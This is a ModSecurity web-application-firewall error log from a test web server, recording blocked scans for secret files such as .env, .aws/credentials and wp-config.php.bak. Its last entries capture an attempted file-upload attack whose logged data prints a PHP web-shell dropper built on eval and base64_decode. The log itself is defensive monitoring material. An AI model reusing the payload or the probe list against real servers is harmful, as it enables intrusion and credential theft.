[Fri Dec 19 21:14:11.593047 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUWyE1b5He19s00C5dcBhQAAAAQ"]
[Fri Dec 19 21:14:11.593222 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aUWyE1b5He19s00C5dcBhQAAAAQ"]
[Fri Dec 19 21:14:11.681935 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUWyE1b5He19s00C5dcBhgAAAAQ"]
[Fri Dec 19 21:14:11.682175 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUWyE1b5He19s00C5dcBhgAAAAQ"]
[Fri Dec 19 21:14:11.683247 2025] [:error] [pid 850619] [client 45.148.10.159:52832] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aUWyE1b5He19s00C5dcBhgAAAAQ"]
[Fri Dec 19 21:14:11.953827 2025] [:error] [pid 850610] [client 45.148.10.159:52844] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUWyE4EmEm_Z-LrykDqgUgAAAAY"]
[Fri Dec 19 21:14:11.954042 2025] [:error] [pid 850610] [client 45.148.10.159:52844] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUWyE4EmEm_Z-LrykDqgUgAAAAY"]
[Fri Dec 19 21:14:11.954233 2025] [:error] [pid 850610] [client 45.148.10.159:52844] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aUWyE4EmEm_Z-LrykDqgUgAAAAY"]
[Fri Dec 19 21:14:12.189457 2025] [:error] [pid 839886] [client 45.148.10.159:52846] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUWyFFi5HgpQVmqH-SUAjwAAAAc"]
[Fri Dec 19 21:14:12.189673 2025] [:error] [pid 839886] [client 45.148.10.159:52846] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUWyFFi5HgpQVmqH-SUAjwAAAAc"]
[Fri Dec 19 21:14:12.189838 2025] [:error] [pid 839886] [client 45.148.10.159:52846] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aUWyFFi5HgpQVmqH-SUAjwAAAAc"]
[Fri Dec 19 21:14:12.481045 2025] [:error] [pid 834992] [client 45.148.10.159:52856] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUWyFGUkfshjVnOZlCKIyQAAAAI"]
[Fri Dec 19 21:14:12.481278 2025] [:error] [pid 834992] [client 45.148.10.159:52856] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUWyFGUkfshjVnOZlCKIyQAAAAI"]
[Fri Dec 19 21:14:12.481457 2025] [:error] [pid 834992] [client 45.148.10.159:52856] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aUWyFGUkfshjVnOZlCKIyQAAAAI"]
[Fri Dec 19 21:14:14.343196 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUWyFuQyAZTrDtMMzDspWAAAAAg"]
[Fri Dec 19 21:14:14.343436 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUWyFuQyAZTrDtMMzDspWAAAAAg"]
[Fri Dec 19 21:14:14.343610 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aUWyFuQyAZTrDtMMzDspWAAAAAg"]
[Fri Dec 19 21:14:14.408361 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUWyFuQyAZTrDtMMzDspWQAAAAg"]
[Fri Dec 19 21:14:14.408481 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUWyFuQyAZTrDtMMzDspWQAAAAg"]
[Fri Dec 19 21:14:14.408705 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUWyFuQyAZTrDtMMzDspWQAAAAg"]
[Fri Dec 19 21:14:14.408887 2025] [:error] [pid 839889] [client 45.148.10.159:52868] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aUWyFuQyAZTrDtMMzDspWQAAAAg"]
[Fri Dec 19 21:14:19.406961 2025] [:error] [pid 850608] [client 45.148.10.159:50744] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aUWyGxjw2n6yIrI5luNkPwAAAAM"]
[Fri Dec 19 21:14:19.407252 2025] [:error] [pid 850608] [client 45.148.10.159:50744] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aUWyGxjw2n6yIrI5luNkPwAAAAM"]
[Fri Dec 19 21:14:19.407406 2025] [:error] [pid 850608] [client 45.148.10.159:50744] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aUWyGxjw2n6yIrI5luNkPwAAAAM"]
[Fri Dec 19 21:17:07.631230 2025] [:error] [pid 850610] [client 45.148.10.159:46836] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aUWyw4EmEm_Z-LrykDqgXAAAAAY"]
[Fri Dec 19 21:17:07.631509 2025] [:error] [pid 850610] [client 45.148.10.159:46836] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aUWyw4EmEm_Z-LrykDqgXAAAAAY"]
[Fri Dec 19 21:17:07.631677 2025] [:error] [pid 850610] [client 45.148.10.159:46836] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aUWyw4EmEm_Z-LrykDqgXAAAAAY"]
[Fri Dec 19 21:17:07.709055 2025] [:error] [pid 850610] [client 45.148.10.159:46836] [client 45.148.10.159] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aUWyw4EmEm_Z-LrykDqgXwAAAAY"]
[Fri Dec 19 21:17:07.709244 2025] [:error] [pid 850610] [client 45.148.10.159:46836] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aUWyw4EmEm_Z-LrykDqgXwAAAAY"]
[Fri Dec 19 21:17:07.709378 2025] [:error] [pid 850610] [client 45.148.10.159:46836] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aUWyw4EmEm_Z-LrykDqgXwAAAAY"]
[Fri Dec 19 21:17:19.005152 2025] [:error] [pid 839890] [client 45.148.10.159:42498] [client 45.148.10.159] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUWyz4QStO_v-3hKEQTFHQAAAAk"]
[Fri Dec 19 21:17:19.005349 2025] [:error] [pid 839890] [client 45.148.10.159:42498] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUWyz4QStO_v-3hKEQTFHQAAAAk"]
[Fri Dec 19 21:17:19.005541 2025] [:error] [pid 839890] [client 45.148.10.159:42498] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aUWyz4QStO_v-3hKEQTFHQAAAAk"]
[Sat Dec 20 01:33:14.013753 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Rule 7fe18767fbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.phar"] [unique_id "aUXuyuu6PN3P_14DnkuHqwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 01:33:14.014289 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.phar"] [unique_id "aUXuyuu6PN3P_14DnkuHqwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 01:33:14.016769 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.phar"] [unique_id "aUXuyuu6PN3P_14DnkuHqwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 20 01:33:14.016980 2025] [:error] [pid 854749] [client 194.110.207.198:50354] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/n/cn88364f428d25.phar"] [unique_id "aUXuyuu6PN3P_14DnkuHqwAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
